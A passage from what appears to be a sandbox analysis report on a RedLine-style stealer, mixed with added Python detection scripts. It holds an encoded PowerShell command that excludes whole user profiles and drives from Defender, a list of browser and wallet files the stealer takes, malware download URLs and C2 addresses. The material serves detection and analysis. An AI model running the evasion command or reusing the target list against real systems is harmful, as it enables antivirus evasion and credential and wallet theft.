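    'RQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBm'
    'AGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"'
)
# Constructed process-creation records (Sysmon Event ID 1 shape). Only the
# first is from the report; the second is a benign decoy.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": SAMPLE_CMDLINE},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -Command Get-Date"},
]
# How much of the disk a Defender exclusion on each variable covers (assumed table).
ENV_SCOPE: Dict[str, str] = {
    "systemdrive": "entire system drive", "userprofile": "whole user profile",
    "appdata": "roaming AppData", "localappdata": "local AppData",
    "temp": "user temp directory", "programdata": "ProgramData",
}
BROAD_SCOPES = {"entire system drive", "whole user profile"}

# -flag <base64> with an optional opening quote; PowerShell accepts any
# unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), checked below.
FLAG_RE = re.compile(r"(?<!\S)[-/]([A-Za-z]+)\s+[\"']?([A-Za-z0-9+/=]{8,})")
DEFENDER_RE = re.compile(r"(?i)\b(?:Add|Set)-MpPreference\b")
DISABLE_RE = re.compile(r"(?i)Set-MpPreference.*?-Disable[A-Za-z]+")
EXCLUSION_RE = re.compile(r"(?i)-Exclusion(Path|Process|Extension)\s+(.+?)(?=\s+-[A-Za-z]|$)")
ENV_RE = re.compile(r"(?i)\$env:([A-Za-z_]+)|%([A-Za-z_]+)%")
DRIVE_ROOT_RE = re.compile(r"(?i)(?<![\w\\])([A-Z]:\\?)(?=[\s,)'\"]|$)")


@dataclass
class Finding:
    rule: str
    severity: str
    detail: str


def encode_command(text: str) -> str:
    """Produce the UTF-16LE/base64 form PowerShell expects (useful for test cases)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none."""
    for flag, payload in FLAG_RE.findall(cmdline):
        f = flag.lower()
        if not (f.startswith("e") and "encodedcommand".startswith(f)):
            continue  # some other switch, e.g. -ExecutionPolicy
        try:
            return base64.b64decode(payload, validate=True).decode("utf-16-le")
        except (binascii.Error, UnicodeDecodeError, ValueError):
            return None  # malformed payload: PowerShell would reject it too
    return None


def analyze_powershell(cmdline: str) -> List[Finding]:
    """Decode if needed, then look for Defender tampering in the effective script."""
    findings: List[Finding] = []
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    if decoded is not None:
        findings.append(Finding("encoded_command", "medium", f"decoded: {decoded}"))
    if not DEFENDER_RE.search(script):
        return findings
    if DISABLE_RE.search(script):
        findings.append(Finding("defender_disable", "high", "Set-MpPreference -Disable* switch"))
    for kind, value in EXCLUSION_RE.findall(script):
        # Resolve $env:/%VAR% references and bare drive roots into coverage labels.
        scopes = [ENV_SCOPE.get((a or b).lower(), f"$env:{a or b}") for a, b in ENV_RE.findall(value)]
        scopes += [f"drive root {d}" for d in DRIVE_ROOT_RE.findall(value)]
        broad = any(s in BROAD_SCOPES or s.startswith("drive root") for s in scopes)
        findings.append(Finding("defender_exclusion", "high" if broad else "medium",
                                f"Exclusion{kind} {value} covers: {', '.join(scopes) or 'specific path(s)'}"))
    return findings


def scan_process_events(events) -> List[tuple]:
    """Run the analysis over PowerShell launches; returns (parent, image, findings)."""
    hits = []
    for ev in events:
        if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
            continue
        findings = analyze_powershell(ev["cmdline"])
        if findings:
            hits.append((ev["parent"], ev["image"], findings))
    return hits


if __name__ == "__main__":
    for parent, image, findings in scan_process_events(SAMPLE_EVENTS):
        print(f"{parent} -> {image}")
        for f in findings:
            print(f"  [{f.severity}] {f.rule}: {f.detail}")
```

Two practical notes. `Add-MpPreference` only succeeds from an elevated shell, so a hit from a non-elevated parent (here cmd.exe spawned by a dropped filename.exe) is still worth alerting on even if the exclusion did not take effect; and on the endpoint itself the change is recorded by Defender as Event ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, which is the place to confirm whether the exclusion landed.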

                    Stealing of Sensitive Information

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.542266865.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.648033641.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.548433577.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2140, type: MEMORYSTR
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ElectrumE#
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: m2C:\Users\user\AppData\Roaming\Electrum\wallets\*
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: JaxxE#
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Ethereum\wallets
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: ExodusE#
                    Source: InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: EthereumE#
                    Source: InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: m6C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
                    Source: powershell.exe, 0000001D.00000002.715187766.00007FF9F0040000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: sqlcolumnencryptionkeystoreprovider
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                    Source: Yara match | File source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2140, type: MEMORYSTR
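The memory strings and file-open events above give the artifact list this RedLine build goes after: Chrome's Cookies, Web Data and Login Data SQLite files, and the Electrum, Exodus and Ethereum wallet directories, written in the config as `%appdata%`-style templates that the stealer expands per user profile. The same list works in the other direction as a hunt: a process that is not the owning browser or wallet application opening several of these files in one session is stealer-like behaviour, and here the accessing process was the injected-into InstallUtil.exe. The script below is an added example, not report or project code. The path templates are taken from the strings and events in this report; the owner-process names, the file-access record shape (`image`, `path`) and the sample events are this example's assumptions.

```python
"""Hunt for non-owner processes touching the browser and wallet artifacts that
this RedLine configuration targets (added example, not report content)."""
import fnmatch
import ntpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Set, Tuple

# (category, path template as the stealer config writes it, processes that
# legitimately open it). Templates come from this report; owners are assumed.
SENSITIVE: List[Tuple[str, str, Tuple[str, ...]]] = [
    ("chrome_cookies", r"%localappdata%\Google\Chrome\User Data\*\Cookies", ("chrome.exe",)),
    ("chrome_webdata", r"%localappdata%\Google\Chrome\User Data\*\Web Data", ("chrome.exe",)),
    ("chrome_logins", r"%localappdata%\Google\Chrome\User Data\*\Login Data", ("chrome.exe",)),
    ("electrum_wallet", r"%appdata%\Electrum\wallets\*", ("electrum.exe",)),
    ("exodus_wallet", r"%appdata%\Exodus\exodus.wallet\*", ("exodus.exe",)),
    ("ethereum_wallet", r"%appdata%\Ethereum\wallets\*", ()),  # no owner known: any access alerts
]

# Constructed file-access records shaped like the "File opened" lines in the
# report. The InstallUtil.exe entries mirror the report; the rest are decoys.
INSTALLUTIL = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
SAMPLE_FILE_EVENTS = [
    {"image": INSTALLUTIL, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies"},
    {"image": INSTALLUTIL, "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "path": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": INSTALLUTIL, "path": r"C:\Users\user\AppData\Roaming\Exodus\exodus.wallet" + "\\"},
    {"image": r"C:\Windows\explorer.exe", "path": r"C:\Users\user\Documents\notes.txt"},
]


@dataclass
class Alert:
    image: str
    path: str
    category: str


def expand_template(template: str, profile: str) -> str:
    """Resolve %appdata%-style variables the way the stealer does for one user profile."""
    env = {
        "userprofile": profile,
        "appdata": ntpath.join(profile, "AppData", "Roaming"),
        "localappdata": ntpath.join(profile, "AppData", "Local"),
    }
    return re.sub(r"%([A-Za-z_]+)%", lambda m: env.get(m.group(1).lower(), m.group(0)), template)


def match_sensitive(path: str, profile: str) -> Optional[Tuple[str, Tuple[str, ...]]]:
    """Return (category, owners) if the path is one of the targeted artifacts."""
    for category, template, owners in SENSITIVE:
        pattern = expand_template(template, profile)
        # fnmatch treats backslash literally, so Windows paths compare as-is;
        # '*' also matches the empty string, covering a directory open like "...\wallets\".
        if fnmatch.fnmatchcase(path.lower(), pattern.lower()):
            return category, owners
    return None


def hunt(events, profile: str) -> List[Alert]:
    """Alert on every access to a targeted artifact by a process other than its owner."""
    alerts: List[Alert] = []
    for ev in events:
        hit = match_sensitive(ev["path"], profile)
        if hit is None:
            continue
        category, owners = hit
        if ntpath.basename(ev["image"]).lower() in owners:
            continue
        alerts.append(Alert(ev["image"], ev["path"], category))
    return alerts


def stealer_candidates(alerts: List[Alert], min_categories: int = 2) -> Dict[str, Set[str]]:
    """Processes that touched several unrelated credential stores look like stealers."""
    by_image: Dict[str, Set[str]] = {}
    for a in alerts:
        by_image.setdefault(a.image, set()).add(a.category)
    return {img: cats for img, cats in by_image.items() if len(cats) >= min_categories}


if __name__ == "__main__":
    found = hunt(SAMPLE_FILE_EVENTS, r"C:\Users\user")
    for a in found:
        print(f"{a.category:16} {a.image} -> {a.path}")
    for img, cats in stealer_candidates(found).items():
        print(f"stealer-like: {img} accessed {sorted(cats)}")
```

The caveat is telemetry: stock Sysmon records file creation (Event ID 11), not reads, so this logic needs EDR file-open events or an object-access SACL (Security Event ID 4663) on the browser profile and wallet directories to have anything to run over. Wallet directories are a better audit target than the Chrome files, which the browser itself touches constantly.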

                    Remote Access Functionality

                    Source: Yara match | File source: dump.pcap, type: PCAP
                    Source: Yara match | File source: 0.3.CryptoMiner.exe.d730000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.CryptoMiner.exe.ae3760.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.CryptoMiner.exe.d730000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.3.CryptoMiner.exe.d730000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 0.2.CryptoMiner.exe.ae3760.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 12.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000000.00000003.538097603.000000000D730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000003.543077511.000000000D732000.00000040.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.543024251.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000000.542266865.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 0000000C.00000002.648033641.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000000.00000002.548433577.0000000000AA4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: InstallUtil.exe PID: 2140, type: MEMORYSTR
                    MITRE ATT&CK Matrix

                    The rendered matrix grid (columns: Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Exfiltration, Command and Control, Network Effects, Remote Service Effects, Impact) did not survive extraction. Techniques whose cells carried a signature count, by tactic:

                    Execution: Windows Management Instrumentation; Native API; Command and Scripting Interpreter; PowerShell
                    Privilege Escalation: Process Injection
                    Defense Evasion: Disable or Modify Tools; Deobfuscate/Decode Files or Information; Obfuscated Files or Information; Software Packing; Masquerading; Virtualization/Sandbox Evasion; Process Injection
                    Credential Access: OS Credential Dumping
                    Discovery: System Time Discovery; File and Directory Discovery; System Information Discovery; Security Software Discovery; Process Discovery; Virtualization/Sandbox Evasion; Application Window Discovery; Remote System Discovery; System Network Configuration Discovery
                    Collection: Archive Collected Data; Data from Local System
                    Command and Control: Ingress Tool Transfer; Encrypted Channel; Non-Standard Port; Non-Application Layer Protocol; Application Layer Protocol

                    No technique was mapped under Initial Access, Persistence, Lateral Movement, Exfiltration, Network Effects, Remote Service Effects or Impact.
                    Behavior Graph (ID: 620659, Sample: CryptoMiner.exe, Start date: 05/05/2022, Architecture: WINDOWS, Score: 100)

                    Sample-level signatures: Snort IDS alert for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 8 other signatures

                    CryptoMiner.exe (started)
                      Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
                      -> InstallUtil.exe (started)
                         Network: 65.21.213.209 (ports 32936, 49796; CP-ASDE, United States); 45.9.20.31 (ports 49802, 80; DEDIPATH-LLCUS, Russian Federation)
                         Dropped: C:\Users\user\AppData\Local\Temp\fname.exe (PE32); C:\Users\user\AppData\Local\...\filename.exe (PE32+)
                         Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines); Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets
                         -> fname.exe (started)
                            Signatures: Antivirus detection for dropped file; Multi AV Scanner detection for dropped file; Query firmware table information (likely to detect VMs); 4 other signatures
                            -> AppLaunch.exe (started)
                               Network: ip-api.com 208.95.112.1 (ports 49832, 80; TUT-ASUS, United States)
                               Signatures: Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); May check the online IP address of the machine
                            -> conhost.exe (started)
                         -> filename.exe (started)
                            Signatures: Machine Learning detection for dropped file
                            -> cmd.exe (started)
                               Signatures: Encrypted powershell cmdline option found
                               -> powershell.exe (started)
                               -> conhost.exe (started)

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial sample
                    Source | Detection | Scanner | Label
                    CryptoMiner.exe | 17% | ReversingLabs | Win32.Trojan.CrypterX
                    CryptoMiner.exe | 100% | Joe Sandbox ML |

                    Dropped files
                    Source | Detection | Scanner | Label
                    C:\Users\user\AppData\Local\Temp\filename.exe | 100% | Avira | HEUR/AGEN.1221911
                    C:\Users\user\AppData\Local\Temp\fname.exe | 100% | Avira | TR/AD.GenSteal.jziki
                    C:\Users\user\AppData\Local\Temp\filename.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Local\Temp\fname.exe | 100% | Joe Sandbox ML |
                    C:\Users\user\AppData\Local\Temp\filename.exe | 29% | Metadefender |
                    C:\Users\user\AppData\Local\Temp\filename.exe | 81% | ReversingLabs | Win64.Worm.AutoRun
                    C:\Users\user\AppData\Local\Temp\fname.exe | 31% | Metadefender |
                    C:\Users\user\AppData\Local\Temp\fname.exe | 69% | ReversingLabs | Win32.Trojan.FormBook

                    Unpacked PE files
                    Source | Detection | Scanner | Label
                    12.0.InstallUtil.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1247441
                    12.2.InstallUtil.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1247441
                    20.3.fname.exe.2f70000.0.unpack | 100% | Avira | HEUR/AGEN.1203048
                    0.3.CryptoMiner.exe.d730000.0.unpack | 100% | Avira | HEUR/AGEN.1247441
                    23.2.filename.exe.850000.0.unpack | 100% | Avira | HEUR/AGEN.1221911
                    0.3.CryptoMiner.exe.d730000.1.unpack | 100% | Avira | HEUR/AGEN.1247441
                    12.0.InstallUtil.exe.400000.1.unpack | 100% | Avira | HEUR/AGEN.1247441
                    23.0.filename.exe.850000.0.unpack | 100% | Avira | HEUR/AGEN.1221911
                    22.2.AppLaunch.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1203048

                    Domains
                    No Antivirus matches

                    URLs
                    Source | Detection | Scanner | Label
                    http://tempuri.org/Entity/Id12Response | 0% | URL Reputation | safe
                    http://tempuri.org/ | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id2Response | 0% | URL Reputation | safe
                    http://45.9.20.314Vl | 0% | Avira URL Cloud | safe
                    http://ns.adobe.c/g | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id21Response | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id9 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id8 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id5 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id4 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id7 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id6 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id19Response | 0% | URL Reputation | safe
                    http://45.9.20.31/rigx.exe | 100% | Avira URL Cloud | malware
                    http://tempuri.org/Entity/Id15Response | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id6Response | 0% | URL Reputation | safe
                    https://api.ip.sb/ip | 0% | URL Reputation | safe
                    http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id9Response | 0% | URL Reputation | safe
                    https://contoso.com/Icon | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id20 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id21 | 0% | URL Reputation | safe
                    http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id22 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id23 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id24 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id24Response | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id1Response | 0% | URL Reputation | safe
                    http://45.9.20.31/asdasdasd.exe | 100% | Avira URL Cloud | malware
                    http://tempuri.org/Entity/Id10 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id11 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id12 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id16Response | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id13 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id14 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id15 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id16 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id17 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id18 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id5Response | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id19 | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id10Response | 0% | URL Reputation | safe
                    http://tempuri.org/Entity/Id8Response | 0% | URL Reputation | safe
                    http://ocsp.sectigo.com0 | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip-api.com | 208.95.112.1 | true | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://45.9.20.31/rigx.exe | true | Avira URL Cloud: malware | unknown
http://45.9.20.31/asdasdasd.exe | true | Avira URL Cloud: malware | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtab | InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | InstallUtil.exe, 0000000C.00000003.616449035.000000000409D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662663297.00000000031A8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.662472558.0000000003191000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.664565017.0000000003EC4000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultL | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.vmware.com/0 | fname.exe.12.dr | false | | high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id12Response | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/ | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id2Response | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://45.9.20.314Vl | InstallUtil.exe, 0000000C.00000002.659462830.0000000002F67000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
http://ns.adobe.c/g | InstallUtil.exe, 0000000C.00000002.656645337.000000000131D000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000003.647783413.000000000131C000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1 | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id21Response | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id9 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id8 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id5 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id4 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id7 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/Entity/Id6 | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://tempuri.org/Entity/Id19Response | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000C.00000002.658034449.0000000002E0D000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted | InstallUtil.exe, 0000000C.00000002.657180507.0000000002CF2000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence | InstallUtil.exe, 0000000C.00000002.656848647.0000000002C61000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://nuget.org/nuget.exe | powershell.exe, 0000001D.00000002.711559950.000001C93E640000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ip-api.com | AppLaunch.exe, 00000016.00000002.688558228.0000000007047000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000016.00000002.688597556.000000000705A000.00000004.00000800.00020000.00000000.sdmp | false | | high
